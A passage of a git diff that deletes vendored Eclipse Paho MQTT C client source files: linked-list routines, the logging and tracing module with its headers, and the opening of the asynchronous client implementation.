- * @return 1=item removed, 0=item not removed
- */
-int ListDetach(List* aList, void* content)
-{
-	return ListUnlink(aList, content, NULL, 0);
-}
-
-
-/**
- * Removes and frees an item in a list by comparing the pointer to the content.
- * @param aList the list from which the item is to be removed
- * @param content pointer to the content to look for
- * @return 1=item removed, 0=item not removed
- */
-int ListRemove(List* aList, void* content)
-{
-	return ListUnlink(aList, content, NULL, 1);
-}
-
-
-/**
- * Removes and frees an the first item in a list.
- * @param aList the list from which the item is to be removed
- * @return 1=item removed, 0=item not removed
- */
-void* ListDetachHead(List* aList)
-{
-	void *content = NULL;
-	if (aList->count > 0)
-	{
-		ListElement* first = aList->first;
-		if (aList->current == first)
-			aList->current = first->next;
-		if (aList->last == first) /* i.e. no of items in list == 1 */
-			aList->last = NULL;
-		content = first->content;
-		aList->first = aList->first->next;
-		if (aList->first)
-			aList->first->prev = NULL;
-		free(first);
-		--(aList->count);
-	}
-	return content;
-}
-
-
-/**
- * Removes and frees an the first item in a list.
- * @param aList the list from which the item is to be removed
- * @return 1=item removed, 0=item not removed
- */
-int ListRemoveHead(List* aList)
-{
-	free(ListDetachHead(aList));
-	return 0;
-}
-
-
-/**
- * Removes but does not free the last item in a list.
- * @param aList the list from which the item is to be removed
- * @return the last item removed (or NULL if none was)
- */
-void* ListPopTail(List* aList)
-{
-	void* content = NULL;
-	if (aList->count > 0)
-	{
-		ListElement* last = aList->last;
-		if (aList->current == last)
-			aList->current = last->prev;
-		if (aList->first == last) /* i.e. no of items in list == 1 */
-			aList->first = NULL;
-		content = last->content;
-		aList->last = aList->last->prev;
-		if (aList->last)
-			aList->last->next = NULL;
-		free(last);
-		--(aList->count);
-	}
-	return content;
-}
-
-
-/**
- * Removes but does not free an element in a list by comparing the content.
- * A callback function is used to define the method of comparison for each element.
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the content to look for
- * @param callback pointer to a function which compares each element
- * @return 1=item removed, 0=item not removed
- */
-int ListDetachItem(List* aList, void* content, int(*callback)(void*, void*))
-{ /* do not free the content */
-	return ListUnlink(aList, content, callback, 0);
-}
-
-
-/**
- * Removes and frees an element in a list by comparing the content.
- * A callback function is used to define the method of comparison for each element
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the content to look for
- * @param callback pointer to a function which compares each element
- * @return 1=item removed, 0=item not removed
- */
-int ListRemoveItem(List* aList, void* content, int(*callback)(void*, void*))
-{ /* remove from list and free the content */
-	return ListUnlink(aList, content, callback, 1);
-}
-
-
-/**
- * Removes and frees all items in a list, leaving the list ready for new items.
- * @param aList the list to which the operation is to be applied
- */
-void ListEmpty(List* aList)
-{
-	while (aList->first != NULL)
-	{
-		ListElement* first = aList->first;
-		if (first->content != NULL)
-			free(first->content);
-		aList->first = first->next;
-		free(first);
-	}
-	aList->count = 0;
-	aList->size = 0;
-	aList->current = aList->first = aList->last = NULL;
-}
-
-/**
- * Removes and frees all items in a list, and frees the list itself
- * @param aList the list to which the operation is to be applied
- */
-void ListFree(List* aList)
-{
-	ListEmpty(aList);
-	free(aList);
-}
-
-
-/**
- * Removes and but does not free all items in a list, and frees the list itself
- * @param aList the list to which the operation is to be applied
- */
-void ListFreeNoContent(List* aList)
-{
-	while (aList->first != NULL)
-	{
-		ListElement* first = aList->first;
-		aList->first = first->next;
-		free(first);
-	}
-	free(aList);
-}
-
-
-/**
- * Forward iteration through a list
- * @param aList the list to which the operation is to be applied
- * @param pos pointer to the current position in the list.  NULL means start from the beginning of the list
- * This is updated on return to the same value as that returned from this function
- * @return pointer to the current list element
- */
-ListElement* ListNextElement(List* aList, ListElement** pos)
-{
-	return *pos = (*pos == NULL) ? aList->first : (*pos)->next;
-}
-
-
-/**
- * Backward iteration through a list
- * @param aList the list to which the operation is to be applied
- * @param pos pointer to the current position in the list.  NULL means start from the end of the list
- * This is updated on return to the same value as that returned from this function
- * @return pointer to the current list element
- */
-ListElement* ListPrevElement(List* aList, ListElement** pos)
-{
-	return *pos = (*pos == NULL) ? aList->last : (*pos)->prev;
-}
-
-
-/**
- * List callback function for comparing integers
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int intcompare(void* a, void* b)
-{
-	return *((int*)a) == *((int*)b);
-}
-
-
-/**
- * List callback function for comparing C strings
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int stringcompare(void* a, void* b)
-{
-	return strcmp((char*)a, (char*)b) == 0;
-}
-
-
-#if defined(UNIT_TESTS)
-
-
-int main(int argc, char *argv[])
-{
-	int i, *ip, *todelete;
-	ListElement* current = NULL;
-	List* l = ListInitialize();
-	printf("List initialized\n");
-
-	for (i = 0; i < 10; i++)
-	{
-		ip = malloc(sizeof(int));
-		*ip = i;
-		ListAppend(l, (void*)ip, sizeof(int));
-		if (i==5)
-			todelete = ip;
-		printf("List element appended %d\n",  *((int*)(l->last->content)));
-	}
-
-	printf("List contents:\n");
-	current = NULL;
-	while (ListNextElement(l, &current) != NULL)
-		printf("List element: %d\n", *((int*)(current->content)));
-
-	printf("List contents in reverse order:\n");
-	current = NULL;
-	while (ListPrevElement(l, &current) != NULL)
-		printf("List element: %d\n", *((int*)(current->content)));
-
-	/* if ListFindItem(l, *ip, intcompare)->content */
-
-	printf("List contents having deleted element %d:\n", *todelete);
-	ListRemove(l, todelete);
-	current = NULL;
-	while (ListNextElement(l, &current) != NULL)
-		printf("List element: %d\n", *((int*)(current->content)));
-
-	i = 9;
-	ListRemoveItem(l, &i, intcompare);
-	printf("List contents having deleted another element, %d, size now %d:\n", i, l->size);
-	current = NULL;
-	while (ListNextElement(l, &current) != NULL)
-		printf("List element: %d\n", *((int*)(current->content)));
-
-	ListFree(l);
-	printf("List freed\n");
-}
-
-#endif
-
-
-
-
-
diff --git a/thirdparty/paho.mqtt.c/src/LinkedList.h b/thirdparty/paho.mqtt.c/src/LinkedList.h
deleted file mode 100644
index 102a4fd..0000000
--- a/thirdparty/paho.mqtt.c/src/LinkedList.h
+++ /dev/null
@@ -1,105 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - updates for the async client
- *    Ian Craggs - change size types from int to size_t
- *******************************************************************************/
-
-#if !defined(LINKEDLIST_H)
-#define LINKEDLIST_H
-
-#include <stdlib.h> /* for size_t definition */
-
-/*BE
-defm defList(T)
-
-def T concat Item
-{
-	at 4
-	n32 ptr T concat Item suppress "next"
-	at 0
-	n32 ptr T concat Item suppress "prev"
-	at 8
-	n32 ptr T id2str(T)
-}
-
-def T concat List
-{
-	n32 ptr T concat Item suppress "first"
-	n32 ptr T concat Item suppress "last"
-	n32 ptr T concat Item suppress "current"
-	n32 dec "count"
-	n32 suppress "size"
-}
-endm
-
-defList(INT)
-defList(STRING)
-defList(TMP)
-
-BE*/
-
-/**
- * Structure to hold all data for one list element
- */
-typedef struct ListElementStruct
-{
-	struct ListElementStruct *prev, /**< pointer to previous list element */
-							*next;	/**< pointer to next list element */
-	void* content;					/**< pointer to element content */
-} ListElement;
-
-
-/**
- * Structure to hold all data for one list
- */
-typedef struct
-{
-	ListElement *first,	/**< first element in the list */
-				*last,	/**< last element in the list */
-				*current;	/**< current element in the list, for iteration */
-	int count;  /**< no of items */
-	size_t size;  /**< heap storage used */
-} List;
-
-void ListZero(List*);
-List* ListInitialize(void);
-
-void ListAppend(List* aList, void* content, size_t size);
-void ListAppendNoMalloc(List* aList, void* content, ListElement* newel, size_t size);
-void ListInsert(List* aList, void* content, size_t size, ListElement* index);
-
-int ListRemove(List* aList, void* content);
-int ListRemoveItem(List* aList, void* content, int(*callback)(void*, void*));
-void* ListDetachHead(List* aList);
-int ListRemoveHead(List* aList);
-void* ListPopTail(List* aList);
-
-int ListDetach(List* aList, void* content);
-int ListDetachItem(List* aList, void* content, int(*callback)(void*, void*));
-
-void ListFree(List* aList);
-void ListEmpty(List* aList);
-void ListFreeNoContent(List* aList);
-
-ListElement* ListNextElement(List* aList, ListElement** pos);
-ListElement* ListPrevElement(List* aList, ListElement** pos);
-
-ListElement* ListFind(List* aList, void* content);
-ListElement* ListFindItem(List* aList, void* content, int(*callback)(void*, void*));
-
-int intcompare(void* a, void* b);
-int stringcompare(void* a, void* b);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Log.c b/thirdparty/paho.mqtt.c/src/Log.c
deleted file mode 100644
index 472e888..0000000
--- a/thirdparty/paho.mqtt.c/src/Log.c
+++ /dev/null
@@ -1,572 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - updates for the async client
- *    Ian Craggs - fix for bug #427028
- *******************************************************************************/
-
-/**
- * @file
- * \brief Logging and tracing module
- *
- * 
- */
-
-#include "Log.h"
-#include "MQTTPacket.h"
-#include "MQTTProtocol.h"
-#include "MQTTProtocolClient.h"
-#include "Messages.h"
-#include "LinkedList.h"
-#include "StackTrace.h"
-#include "Thread.h"
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <stdarg.h>
-#include <time.h>
-#include <string.h>
-
-#if !defined(WIN32) && !defined(WIN64)
-#include <syslog.h>
-#include <sys/stat.h>
-#define GETTIMEOFDAY 1
-#else
-#define snprintf _snprintf
-#endif
-
-#if defined(GETTIMEOFDAY)
-	#include <sys/time.h>
-#else
-	#include <sys/timeb.h>
-#endif
-
-#if !defined(WIN32) && !defined(WIN64)
-/**
- * _unlink mapping for linux
- */
-#define _unlink unlink
-#endif
-
-
-#if !defined(min)
-#define min(A,B) ( (A) < (B) ? (A):(B))
-#endif
-
-trace_settings_type trace_settings =
-{
-	TRACE_MINIMUM,
-	400,
-	INVALID_LEVEL
-};
-
-#define MAX_FUNCTION_NAME_LENGTH 256
-
-typedef struct
-{
-#if defined(GETTIMEOFDAY)
-	struct timeval ts;
-#else
-	struct timeb ts;
-#endif
-	int sametime_count;
-	int number;
-	int thread_id;
-	int depth;
-	char name[MAX_FUNCTION_NAME_LENGTH + 1];
-	int line;
-	int has_rc;
-	int rc;
-	enum LOG_LEVELS level;
-} traceEntry;
-
-static int start_index = -1,
-			next_index = 0;
-static traceEntry* trace_queue = NULL;
-static int trace_queue_size = 0;
-
-static FILE* trace_destination = NULL;	/**< flag to indicate if trace is to be sent to a stream */
-static char* trace_destination_name = NULL; /**< the name of the trace file */
-static char* trace_destination_backup_name = NULL; /**< the name of the backup trace file */
-static int lines_written = 0; /**< number of lines written to the current output file */
-static int max_lines_per_file = 1000; /**< maximum number of lines to write to one trace file */
-static enum LOG_LEVELS trace_output_level = INVALID_LEVEL;
-static Log_traceCallback* trace_callback = NULL;
-static traceEntry* Log_pretrace(void);
-static char* Log_formatTraceEntry(traceEntry* cur_entry);
-static void Log_output(enum LOG_LEVELS log_level, const char *msg);
-static void Log_posttrace(enum LOG_LEVELS log_level, traceEntry* cur_entry);
-static void Log_trace(enum LOG_LEVELS log_level, const char *buf);
-#if 0
-static FILE* Log_destToFile(const char *dest);
-static int Log_compareEntries(const char *entry1, const char *entry2);
-#endif
-
-static int sametime_count = 0;
-#if defined(GETTIMEOFDAY)
-struct timeval ts, last_ts;
-#else
-struct timeb ts, last_ts;
-#endif
-static char msg_buf[512];
-
-#if defined(WIN32) || defined(WIN64)
-mutex_type log_mutex;
-#else
-static pthread_mutex_t log_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type log_mutex = &log_mutex_store;
-#endif
-
-
-int Log_initialize(Log_nameValue* info)
-{
-	int rc = -1;
-	char* envval = NULL;
-
-	if ((trace_queue = malloc(sizeof(traceEntry) * trace_settings.max_trace_entries)) == NULL)
-		return rc;
-	trace_queue_size = trace_settings.max_trace_entries;
-
-	if ((envval = getenv("MQTT_C_CLIENT_TRACE")) != NULL && strlen(envval) > 0)
-	{
-		if (strcmp(envval, "ON") == 0 || (trace_destination = fopen(envval, "w")) == NULL)
-			trace_destination = stdout;
-		else
-		{
-			trace_destination_name = malloc(strlen(envval) + 1);
-			strcpy(trace_destination_name, envval);
-			trace_destination_backup_name = malloc(strlen(envval) + 3);
-			sprintf(trace_destination_backup_name, "%s.0", trace_destination_name);
-		}
-	}
-	if ((envval = getenv("MQTT_C_CLIENT_TRACE_MAX_LINES")) != NULL && strlen(envval) > 0)
-	{
-		max_lines_per_file = atoi(envval);
-		if (max_lines_per_file <= 0)
-			max_lines_per_file = 1000;
-	}
-	if ((envval = getenv("MQTT_C_CLIENT_TRACE_LEVEL")) != NULL && strlen(envval) > 0)
-	{
-		if (strcmp(envval, "MAXIMUM") == 0 || strcmp(envval, "TRACE_MAXIMUM") == 0)
-			trace_settings.trace_level = TRACE_MAXIMUM;
-		else if (strcmp(envval, "MEDIUM") == 0 || strcmp(envval, "TRACE_MEDIUM") == 0)
-			trace_settings.trace_level = TRACE_MEDIUM;
-		else if (strcmp(envval, "MINIMUM") == 0 || strcmp(envval, "TRACE_MEDIUM") == 0)
-			trace_settings.trace_level = TRACE_MINIMUM;
-		else if (strcmp(envval, "PROTOCOL") == 0  || strcmp(envval, "TRACE_PROTOCOL") == 0)
-			trace_output_level = TRACE_PROTOCOL;
-		else if (strcmp(envval, "ERROR") == 0  || strcmp(envval, "TRACE_ERROR") == 0)
-			trace_output_level = LOG_ERROR;
-	}
-	Log_output(TRACE_MINIMUM, "=========================================================");
-	Log_output(TRACE_MINIMUM, "                   Trace Output");
-	if (info)
-	{
-		while (info->name)
-		{
-			snprintf(msg_buf, sizeof(msg_buf), "%s: %s", info->name, info->value);
-			Log_output(TRACE_MINIMUM, msg_buf);
-			info++;
-		}
-	}
-#if !defined(WIN32) && !defined(WIN64)
-	struct stat buf;
-	if (stat("/proc/version", &buf) != -1)
-	{
-		FILE* vfile;
-		
-		if ((vfile = fopen("/proc/version", "r")) != NULL)
-		{
-			int len;
-			
-			strcpy(msg_buf, "/proc/version: ");
-			len = strlen(msg_buf);
-			if (fgets(&msg_buf[len], sizeof(msg_buf) - len, vfile))
-				Log_output(TRACE_MINIMUM, msg_buf);
-			fclose(vfile);
-		}
-	}
-#endif
-	Log_output(TRACE_MINIMUM, "=========================================================");
-		
-	return rc;
-}
-
-
-void Log_setTraceCallback(Log_traceCallback* callback)
-{
-	trace_callback = callback;
-}
-
-
-void Log_setTraceLevel(enum LOG_LEVELS level)
-{
-	if (level < TRACE_MINIMUM) /* the lowest we can go is TRACE_MINIMUM*/
-		trace_settings.trace_level = level;
-	trace_output_level = level;
-}
-
-
-void Log_terminate(void)
-{
-	free(trace_queue);
-	trace_queue = NULL;
-	trace_queue_size = 0;
-	if (trace_destination)
-	{
-		if (trace_destination != stdout)
-			fclose(trace_destination);
-		trace_destination = NULL;
-	}
-	if (trace_destination_name) {
-		free(trace_destination_name);
-		trace_destination_name = NULL;
-	}
-	if (trace_destination_backup_name) {
-		free(trace_destination_backup_name);
-		trace_destination_backup_name = NULL;
-	}
-	start_index = -1;
-	next_index = 0;
-	trace_output_level = INVALID_LEVEL;
-	sametime_count = 0;
-}
-
-
-static traceEntry* Log_pretrace(void)
-{
-	traceEntry *cur_entry = NULL;
-
-	/* calling ftime/gettimeofday seems to be comparatively expensive, so we need to limit its use */
-	if (++sametime_count % 20 == 0)
-	{
-#if defined(GETTIMEOFDAY)
-		gettimeofday(&ts, NULL);
-		if (ts.tv_sec != last_ts.tv_sec || ts.tv_usec != last_ts.tv_usec)
-#else
-		ftime(&ts);
-		if (ts.time != last_ts.time || ts.millitm != last_ts.millitm)
-#endif
-		{
-			sametime_count = 0;
-			last_ts = ts;
-		}
-	}
-
-	if (trace_queue_size != trace_settings.max_trace_entries)
-	{
-		traceEntry* new_trace_queue = malloc(sizeof(traceEntry) * trace_settings.max_trace_entries);
-
-		memcpy(new_trace_queue, trace_queue, min(trace_queue_size, trace_settings.max_trace_entries) * sizeof(traceEntry));
-		free(trace_queue);
-		trace_queue = new_trace_queue;
-		trace_queue_size = trace_settings.max_trace_entries;
-
-		if (start_index > trace_settings.max_trace_entries + 1 ||
-				next_index > trace_settings.max_trace_entries + 1)
-		{
-			start_index = -1;
-			next_index = 0;
-		}
-	}
-
-	/* add to trace buffer */
-	cur_entry = &trace_queue[next_index];
-	if (next_index == start_index) /* means the buffer is full */
-	{
-		if (++start_index == trace_settings.max_trace_entries)
-			start_index = 0;
-	} else if (start_index == -1)
-		start_index = 0;
-	if (++next_index == trace_settings.max_trace_entries)
-		next_index = 0;
-
-	return cur_entry;
-}
-
-static char* Log_formatTraceEntry(traceEntry* cur_entry)
-{
-	struct tm *timeinfo;
-	int buf_pos = 31;
-
-#if defined(GETTIMEOFDAY)
-	timeinfo = localtime((time_t *)&cur_entry->ts.tv_sec);
-#else
-	timeinfo = localtime(&cur_entry->ts.time);
-#endif
-	strftime(&msg_buf[7], 80, "%Y%m%d %H%M%S ", timeinfo);
-#if defined(GETTIMEOFDAY)
-	sprintf(&msg_buf[22], ".%.3lu ", cur_entry->ts.tv_usec / 1000L);
-#else
-	sprintf(&msg_buf[22], ".%.3hu ", cur_entry->ts.millitm);
-#endif
-	buf_pos = 27;
-
-	sprintf(msg_buf, "(%.4d)", cur_entry->sametime_count);
-	msg_buf[6] = ' ';
-
-	if (cur_entry->has_rc == 2)
-		strncpy(&msg_buf[buf_pos], cur_entry->name, sizeof(msg_buf)-buf_pos);
-	else
-	{
-		const char *format = Messages_get(cur_entry->number, cur_entry->level);
-		if (cur_entry->has_rc == 1)
-			snprintf(&msg_buf[buf_pos], sizeof(msg_buf)-buf_pos, format, cur_entry->thread_id,
-					cur_entry->depth, "", cur_entry->depth, cur_entry->name, cur_entry->line, cur_entry->rc);
-		else
-			snprintf(&msg_buf[buf_pos], sizeof(msg_buf)-buf_pos, format, cur_entry->thread_id,
-					cur_entry->depth, "", cur_entry->depth, cur_entry->name, cur_entry->line);
-	}
-	return msg_buf;
-}
-
-
-static void Log_output(enum LOG_LEVELS log_level, const char *msg)
-{
-	if (trace_destination)
-	{
-		fprintf(trace_destination, "%s\n", msg);
-
-		if (trace_destination != stdout && ++lines_written >= max_lines_per_file)
-		{	
-
-			fclose(trace_destination);		
-			_unlink(trace_destination_backup_name); /* remove any old backup trace file */
-			rename(trace_destination_name, trace_destination_backup_name); /* rename recently closed to backup */
-			trace_destination = fopen(trace_destination_name, "w"); /* open new trace file */
-			if (trace_destination == NULL)
-				trace_destination = stdout;
-			lines_written = 0;
-		}
-		else
-			fflush(trace_destination);
-	}
-		
-	if (trace_callback)
-		(*trace_callback)(log_level, msg);
-}
-
-
-static void Log_posttrace(enum LOG_LEVELS log_level, traceEntry* cur_entry)
-{
-	if (((trace_output_level == -1) ? log_level >= trace_settings.trace_level : log_level >= trace_output_level))
-	{
-		char* msg = NULL;
-		
-		if (trace_destination || trace_callback)
-			msg = &Log_formatTraceEntry(cur_entry)[7];
-		
-		Log_output(log_level, msg);
-	}
-}
-
-
-static void Log_trace(enum LOG_LEVELS log_level, const char *buf)
-{
-	traceEntry *cur_entry = NULL;
-
-	if (trace_queue == NULL)
-		return;
-
-	cur_entry = Log_pretrace();
-
-	memcpy(&(cur_entry->ts), &ts, sizeof(ts));
-	cur_entry->sametime_count = sametime_count;
-
-	cur_entry->has_rc = 2;
-	strncpy(cur_entry->name, buf, sizeof(cur_entry->name));
-	cur_entry->name[MAX_FUNCTION_NAME_LENGTH] = '\0';
-
-	Log_posttrace(log_level, cur_entry);
-}
-
-
-/**
- * Log a message.  If possible, all messages should be indexed by message number, and
- * the use of the format string should be minimized or negated altogether.  If format is
- * provided, the message number is only used as a message label.
- * @param log_level the log level of the message
- * @param msgno the id of the message to use if the format string is NULL
- * @param aFormat the printf format string to be used if the message id does not exist
- * @param ... the printf inserts
- */
-void Log(enum LOG_LEVELS log_level, int msgno, const char *format, ...)
-{
-	if (log_level >= trace_settings.trace_level)
-	{
-		const char *temp = NULL;
-		static char msg_buf[512];
-		va_list args;
-
-		/* we're using a static character buffer, so we need to make sure only one thread uses it at a time */
-		Thread_lock_mutex(log_mutex); 
-		if (format == NULL && (temp = Messages_get(msgno, log_level)) != NULL)
-			format = temp;
-
-		va_start(args, format);
-		vsnprintf(msg_buf, sizeof(msg_buf), format, args);
-
-		Log_trace(log_level, msg_buf);
-		va_end(args);
-		Thread_unlock_mutex(log_mutex); 
-	}
-
-	/*if (log_level >= LOG_ERROR)
-	{
-		char* filename = NULL;
-		Log_recordFFDC(&msg_buf[7]);
-	}
-	*/
-}
-
-
-/**
- * The reason for this function is to make trace logging as fast as possible so that the
- * function exit/entry history can be captured by default without unduly impacting
- * performance.  Therefore it must do as little as possible.
- * @param log_level the log level of the message
- * @param msgno the id of the message to use if the format string is NULL
- * @param aFormat the printf format string to be used if the message id does not exist
- * @param ... the printf inserts
- */
-void Log_stackTrace(enum LOG_LEVELS log_level, int msgno, int thread_id, int current_depth, const char* name, int line, int* rc)
-{
-	traceEntry *cur_entry = NULL;
-
-	if (trace_queue == NULL)
-		return;
-
-	if (log_level < trace_settings.trace_level)
-		return;
-
-	Thread_lock_mutex(log_mutex);
-	cur_entry = Log_pretrace();
-
-	memcpy(&(cur_entry->ts), &ts, sizeof(ts));
-	cur_entry->sametime_count = sametime_count;
-	cur_entry->number = msgno;
-	cur_entry->thread_id = thread_id;
-	cur_entry->depth = current_depth;
-	strcpy(cur_entry->name, name);
-	cur_entry->level = log_level;
-	cur_entry->line = line;
-	if (rc == NULL)
-		cur_entry->has_rc = 0;
-	else
-	{
-		cur_entry->has_rc = 1;
-		cur_entry->rc = *rc;
-	}
-
-	Log_posttrace(log_level, cur_entry);
-	Thread_unlock_mutex(log_mutex);
-}
-
-
-#if 0
-static FILE* Log_destToFile(const char *dest)
-{
-	FILE* file = NULL;
-
-	if (strcmp(dest, "stdout") == 0)
-		file = stdout;
-	else if (strcmp(dest, "stderr") == 0)
-		file = stderr;
-	else
-	{
-		if (strstr(dest, "FFDC"))
-			file = fopen(dest, "ab");
-		else
-			file = fopen(dest, "wb");
-	}
-	return file;
-}
-
-
-static int Log_compareEntries(const char *entry1, const char *entry2)
-{
-	int comp = strncmp(&entry1[7], &entry2[7], 19);
-
-	/* if timestamps are equal, use the sequence numbers */
-	if (comp == 0)
-		comp = strncmp(&entry1[1], &entry2[1], 4);
-
-	return comp;
-}
-
-
-/**
- * Write the contents of the stored trace to a stream
- * @param dest string which contains a file name or the special strings stdout or stderr
- */
-int Log_dumpTrace(char* dest)
-{
-	FILE* file = NULL;
-	ListElement* cur_trace_entry = NULL;
-	const int msgstart = 7;
-	int rc = -1;
-	int trace_queue_index = 0;
-
-	if ((file = Log_destToFile(dest)) == NULL)
-	{
-		Log(LOG_ERROR, 9, NULL, "trace", dest, "trace entries");
-		goto exit;
-	}
-
-	fprintf(file, "=========== Start of trace dump ==========\n");
-	/* Interleave the log and trace entries together appropriately */
-	ListNextElement(trace_buffer, &cur_trace_entry);
-	trace_queue_index = start_index;
-	if (trace_queue_index == -1)
-		trace_queue_index = next_index;
-	else
-	{
-		Log_formatTraceEntry(&trace_queue[trace_queue_index++]);
-		if (trace_queue_index == trace_settings.max_trace_entries)
-			trace_queue_index = 0;
-	}
-	while (cur_trace_entry || trace_queue_index != next_index)
-	{
-		if (cur_trace_entry && trace_queue_index != -1)
-		{	/* compare these timestamps */
-			if (Log_compareEntries((char*)cur_trace_entry->content, msg_buf) > 0)
-				cur_trace_entry = NULL;
-		}
-
-		if (cur_trace_entry)
-		{
-			fprintf(file, "%s\n", &((char*)(cur_trace_entry->content))[msgstart]);
-			ListNextElement(trace_buffer, &cur_trace_entry);
-		}
-		else
-		{
-			fprintf(file, "%s\n", &msg_buf[7]);
-			if (trace_queue_index != next_index)
-			{
-				Log_formatTraceEntry(&trace_queue[trace_queue_index++]);
-				if (trace_queue_index == trace_settings.max_trace_entries)
-					trace_queue_index = 0;
-			}
-		}
-	}
-	fprintf(file, "========== End of trace dump ==========\n\n");
-	if (file != stdout && file != stderr && file != NULL)
-		fclose(file);
-	rc = 0;
-exit:
-	return rc;
-}
-#endif
-
-
diff --git a/thirdparty/paho.mqtt.c/src/Log.h b/thirdparty/paho.mqtt.c/src/Log.h
deleted file mode 100644
index 455beb6..0000000
--- a/thirdparty/paho.mqtt.c/src/Log.h
+++ /dev/null
@@ -1,85 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - updates for the async client
- *******************************************************************************/
-
-#if !defined(LOG_H)
-#define LOG_H
-
-/*BE
-map LOG_LEVELS
-{
-	"TRACE_MAXIMUM" 1
-	"TRACE_MEDIUM" 2
-	"TRACE_MINIMUM" 3
-	"TRACE_PROTOCOL" 4
-
-	"ERROR" 5
-	"SEVERE" 6
-	"FATAL" 7
-}
-BE*/
-
-enum LOG_LEVELS {
-	INVALID_LEVEL = -1,
-	TRACE_MAXIMUM = 1,
-	TRACE_MEDIUM,
-	TRACE_MINIMUM,
-	TRACE_PROTOCOL,
-	LOG_ERROR,
-	LOG_SEVERE,
-	LOG_FATAL,
-};
-
-
-/*BE
-def trace_settings_type
-{
-   n32 map LOG_LEVELS "trace_level"
-   n32 dec "max_trace_entries"
-   n32 dec "trace_output_level"
-}
-BE*/
-typedef struct
-{
-	enum LOG_LEVELS trace_level;	/**< trace level */
-	int max_trace_entries;		/**< max no of entries in the trace buffer */
-	enum LOG_LEVELS trace_output_level;		/**< trace level to output to destination */
-} trace_settings_type;
-
-extern trace_settings_type trace_settings;
-
-#define LOG_PROTOCOL TRACE_PROTOCOL
-#define TRACE_MAX TRACE_MAXIMUM
-#define TRACE_MIN TRACE_MINIMUM
-#define TRACE_MED TRACE_MEDIUM
-
-typedef struct
-{
-	const char* name;
-	const char* value;
-} Log_nameValue;
-
-int Log_initialize(Log_nameValue*);
-void Log_terminate(void);
-
-void Log(enum LOG_LEVELS, int, const char *, ...);
-void Log_stackTrace(enum LOG_LEVELS, int, int, int, const char*, int, int*);
-
-typedef void Log_traceCallback(enum LOG_LEVELS level, const char *message);
-void Log_setTraceCallback(Log_traceCallback* callback);
-void Log_setTraceLevel(enum LOG_LEVELS level);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTAsync.c b/thirdparty/paho.mqtt.c/src/MQTTAsync.c
deleted file mode 100644
index 87a1088..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTAsync.c
+++ /dev/null
@@ -1,3227 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation and documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL support
- *    Ian Craggs - multiple server connection support
- *    Ian Craggs - fix for bug 413429 - connectionLost not called
- *    Ian Craggs - fix for bug 415042 - using already freed structure
- *    Ian Craggs - fix for bug 419233 - mutexes not reporting errors
- *    Ian Craggs - fix for bug 420851
- *    Ian Craggs - fix for bug 432903 - queue persistence
- *    Ian Craggs - MQTT 3.1.1 support
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *    Ian Craggs - fix for bug 442400: reconnecting after network cable unplugged
- *    Ian Craggs - fix for bug 444934 - incorrect free in freeCommand1
- *    Ian Craggs - fix for bug 445891 - assigning msgid is not thread safe
- *    Ian Craggs - fix for bug 465369 - longer latency than expected
- *    Ian Craggs - fix for bug 444103 - success/failure callbacks not invoked
- *    Ian Craggs - fix for bug 484363 - segfault in getReadySocket
- *    Ian Craggs - automatic reconnect and offline buffering (send while disconnected)
- *    Ian Craggs - fix for bug 472250
- *    Ian Craggs - fix for bug 486548
- *    Ian Craggs - SNI support
- *    Ian Craggs - auto reconnect timing fix #218
- *    Ian Craggs - fix for issue #190
- *******************************************************************************/
-
-/**
- * @file
- * \brief Asynchronous API implementation
- *
- */
-
-#define _GNU_SOURCE /* for pthread_mutexattr_settype */
-#include <stdlib.h>
-#include <string.h>
-#if !defined(WIN32) && !defined(WIN64)
-	#include <sys/time.h>
-#endif
-
-#if !defined(NO_PERSISTENCE)
-#include "MQTTPersistence.h"
-#endif
-#include "MQTTAsync.h"
-#include "utf-8.h"
-#include "MQTTProtocol.h"
-#include "MQTTProtocolOut.h"
-#include "Thread.h"
-#include "SocketBuffer.h"
-#include "StackTrace.h"
-#include "Heap.h"
-#include "OsWrapper.h"
-
